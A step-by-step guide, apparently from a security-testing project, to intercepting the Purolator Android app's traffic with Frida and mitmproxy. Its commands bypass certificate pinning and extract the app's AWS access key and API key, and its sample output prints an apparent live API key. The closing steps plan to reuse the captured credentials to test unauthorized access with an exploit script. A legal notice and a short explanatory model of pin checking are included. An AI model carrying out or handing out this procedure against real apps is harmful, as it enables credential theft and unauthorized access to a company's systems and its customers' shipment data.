# Purolator API Interception Guide

## ⚠️ SSL Pinning: YES, YOU NEED TO BYPASS IT!

**Answer: YES.** The Purolator app uses OkHttp3 with `CertificatePinner` enabled, so the HTTPS interception described below only works once SSL pinning is bypassed.

---

## 🎯 Quick Start (3 Options)

### Option 1: Complete Interception (RECOMMENDED)

**Does everything: SSL bypass + credential capture**

```bash
frida -U -f com.purolator.mobileapp -l complete_intercept.js --no-pause
```

**What it does:**

- ✅ Bypasses SSL pinning automatically
- ✅ Captures AWS Access Key ID
- ✅ Captures API Key
- ✅ Logs all tracking API requests
- ✅ Monitors credential decryption

**No additional setup needed!** Just run Frida and track a shipment.

---

### Option 2: Separate SSL Bypass + Interception

**For when you want to use mitmproxy separately**

**Step 1: Run SSL bypass**

```bash
frida -U -f com.purolator.mobileapp -l ssl_pinning_bypass.js --no-pause
```

**Step 2: In another terminal, run mitmproxy**

```bash
mitmproxy --mode transparent --showhost
```

**Step 3: In another terminal, run request interceptor**

```bash
frida -U com.purolator.mobileapp -l intercept_tracking.js
```

---

### Option 3: mitmproxy Only (if Frida isn't working)

**Requires root and more setup**

1. Install the mitmproxy CA certificate on the device
2. Use Magisk + the MagiskTrustUserCerts module to move it into the system trust store (a system-trusted CA alone does not satisfy `CertificatePinner`; pinning still has to be handled)
3. Or use Xposed + the JustTrustMe module

---

## 📱 Device Setup

### Prerequisites

1. **Rooted Android device** or emulator (Genymotion/Android Studio)
2. **Frida installed**: `pip install frida-tools`
3. **frida-server running** on device
4. **Purolator app installed**

### Quick Device Check

```bash
# Check if device is connected
adb devices

# Check if frida is working
frida-ps -U

# Should see list of running processes
```

---

## 🔧 Detailed Setup

### 1. Install Frida Server on Device

```bash
# Download frida-server for your device
# Check architecture first
adb shell getprop ro.product.cpu.abi
# Output: arm64-v8a, armeabi-v7a, x86, or x86_64

# Download the matching frida-server release (an .xz archive; decompress it first) from:
# https://github.com/frida/frida/releases
# The frida-server version must match the frida-tools version on your host (frida --version)

# Example for arm64:
adb push frida-server-16.1.4-android-arm64 /data/local/tmp/frida-server
adb shell "chmod 755 /data/local/tmp/frida-server"
# frida-server must run as root: run `adb root` first (emulator / userdebug builds),
# or start it with `su -c` on a Magisk-rooted device
adb shell "/data/local/tmp/frida-server &"
```

### 2. Verify Frida is Working

```bash
frida-ps -U
# Should see Android processes
```

### 3. Run Complete Interception

```bash
frida -U -f com.purolator.mobileapp -l complete_intercept.js --no-pause
```

### 4. Use the App

1. Open Purolator app
2. Go to "Track Shipment"
3. Enter: **520127751300**
4. Watch your terminal!

---

## 🎯 What You'll Capture

### Expected Output

```
═══════════════════════════════════════════════════════════════════════
🎯 TRACKING API REQUEST
═══════════════════════════════════════════════════════════════════════
URL: https://api.purolator.com/tracking-ext/v1/search
Method: POST
Time: 2025-11-08T12:34:56.789Z

📋 HEADERS:
  Authorization: AWS4-HMAC-SHA256 Credential=AKIAIOSFODNN7EXAMPLE/20251108/us-east-1/execute-api/aws4_request, SignedHeaders=content-type;host;x-amz-date;x-api-key, Signature=abc123def456...
  X-API-Key: okpCK3fFSk645Ev3
  Content-Type: application/json
  Host: api.purolator.com
  X-Amz-Date: 20251108T123456Z

📦 REQUEST BODY:
{"shipmentNumber":"520127751300"}

🔑 EXTRACTED CREDENTIALS:
═══════════════════════════════════════════════════════════════════════
✓ AWS Access Key ID: AKIAIOSFODNN7EXAMPLE

⚠️  CRITICAL: Save this AWS key for POC!
✓ API Key: okpCK3fFSk645Ev3
═══════════════════════════════════════════════════════════════════════
```

---

## 🔐 Why SSL Pinning Bypass is Needed

The Purolator app uses **OkHttp3** with `CertificatePinner`, which:

1. **Validates certificate chains** against hardcoded public-key pins (SHA-256 hashes of a certificate's SubjectPublicKeyInfo)
2. **Blocks man-in-the-middle proxies** like mitmproxy, whose generated certificates carry a different public key
3. **Prevents interception** even with root access and a system-trusted proxy CA

Without bypass, you'll see:

```
javax.net.ssl.SSLPeerUnverifiedException: Certificate pinning failure!
```

**Our scripts handle this automatically!**
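To make concrete what `CertificatePinner.check()` enforces, and why a proxy certificate produces the exception above, here is a small Python model of the check. This is an added illustration, not OkHttp's or the page's code; the SPKI bytes and the pin set are constructed stand-ins, and the hostname is the one shown in the captured request.

```python
import base64
import hashlib


class CertificatePinningFailure(Exception):
    """Stand-in for the SSLPeerUnverifiedException OkHttp raises on a pin mismatch."""


def pin_for_spki(spki_der: bytes) -> str:
    """OkHttp pin format: 'sha256/' + base64(SHA-256(SubjectPublicKeyInfo DER))."""
    return "sha256/" + base64.b64encode(hashlib.sha256(spki_der).digest()).decode()


def pattern_matches(pattern: str, hostname: str) -> bool:
    """Host matching as CertificatePinner does it: exact, '*.' (one label), '**.' (any depth)."""
    if pattern.startswith("**."):
        return hostname == pattern[3:] or hostname.endswith(pattern[2:])
    if pattern.startswith("*."):
        suffix = pattern[1:]  # ".purolator.com"
        return hostname.endswith(suffix) and "." not in hostname[: -len(suffix)]
    return hostname == pattern


def check_pins(pins: dict, hostname: str, chain_spkis: list) -> None:
    """Emulate CertificatePinner.check(): some cert in the chain must carry a pinned key."""
    expected = {p for pat, ps in pins.items() if pattern_matches(pat, hostname) for p in ps}
    if not expected:
        return  # host is not pinned: ordinary TLS validation alone applies
    for spki in chain_spkis:
        if pin_for_spki(spki) in expected:
            return  # matched a pinned public key anywhere in the chain
    raise CertificatePinningFailure("Certificate pinning failure!")


# Constructed sample keys (stand-ins for the DER SubjectPublicKeyInfo of real certificates)
REAL_LEAF_SPKI = b"constructed-spki-of-the-genuine-leaf-certificate"
PROXY_SPKI = b"constructed-spki-of-a-mitmproxy-generated-certificate"

# Pin set as the app would ship it; the pin is derived from the constructed genuine key
PINS = {"api.purolator.com": [pin_for_spki(REAL_LEAF_SPKI)]}


def chain_is_accepted(chain_spkis: list) -> bool:
    """True if a chain presenting these public keys passes the pin check for the API host."""
    try:
        check_pins(PINS, "api.purolator.com", chain_spkis)
        return True
    except CertificatePinningFailure:
        return False
```

A proxy chain fails because its public key never appears in the pin set, regardless of which CA signed it; that is why installing the proxy CA on the device is not enough.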

---

## 🐛 Troubleshooting

### Problem: "Failed to spawn: unable to find application"

**Solution:** Check package name

```bash
adb shell pm list packages | grep purolator
# Should show: package:com.purolator.mobileapp
```

### Problem: "Failed to attach: connection closed"

**Solution:** Restart frida-server

```bash
adb shell "pkill frida-server"
adb shell "/data/local/tmp/frida-server &"
```

### Problem: "SSL pinning still blocking"

**Solution:** Use `complete_intercept.js` instead of individual scripts

### Problem: "No output when tracking"

**Solution:**

1. Make sure the app is in the foreground
2. Confirm the request actually happened (the tracking result appeared in the app)
3. Try the `-f` flag to spawn a fresh app instance, so the hooks are installed before the first request is sent

---

## 🎓 Understanding SSL Pinning Bypass

Our script bypasses pinning at **6 different levels**:

1. **CertificatePinner.check()** - Main OkHttp pinning
2. **TrustManager** - Accepts all certificates
3. **HostnameVerifier** - Skips hostname validation
4. **Network Security Config** - Bypasses Android 7+ restrictions
5. **Conscrypt SSLEngine** - Low-level SSL validation
6. **App-specific checks** - Any custom Purolator code

**Result:** Complete SSL interception capability!

---

## 📊 Success Metrics

You've successfully intercepted when you see:

- ✅ `[+] SSL Pinning bypassed for: api.purolator.com`
- ✅ `🎯 TRACKING API REQUEST` with full details
- ✅ `AWS Access Key ID: AKIA...` extracted
- ✅ Request body with your tracking number

---

## 🚀 Next Steps After Successful Interception

1. **Save AWS credentials** from terminal output
2. **Update POC script** with captured AWS keys
3. **Test unauthorized access** with `poc_tracking_exploit.py`
4. **Document findings** for security report
5. **Report to Purolator** security team

---

## 📝 Files Reference

| File                        | Purpose              | When to Use                      |
| --------------------------- | -------------------- | -------------------------------- |
| `complete_intercept.js`     | SSL bypass + capture | **Start here** - does everything |
| `ssl_pinning_bypass.js`     | SSL bypass only      | When using external tools        |
| `intercept_tracking.js`     | Request capture only | When SSL already bypassed        |
| `dynamic_analysis_guide.py` | Theory/documentation | For understanding methods        |

---

## ⚠️ Legal Notice

This is for **authorized security testing only**. Ensure you have:

- Written authorization to test
- Legal permission to intercept traffic
- Proper security disclosure process

**DO NOT** use this for unauthorized access to Purolator systems.

---

## 🎯 Summary

**Q: Do I need SSL pinning bypass?**  
**A: YES** - The app uses OkHttp3 with certificate pinning.

**Q: Which script should I use?**  
**A: `complete_intercept.js`** - It does everything automatically.

**Q: What will I get?**  
**A: AWS credentials + API key** - Everything needed for full exploitation POC.

**Ready?** Run this command and track a shipment:

```bash
frida -U -f com.purolator.mobileapp -l complete_intercept.js --no-pause
```
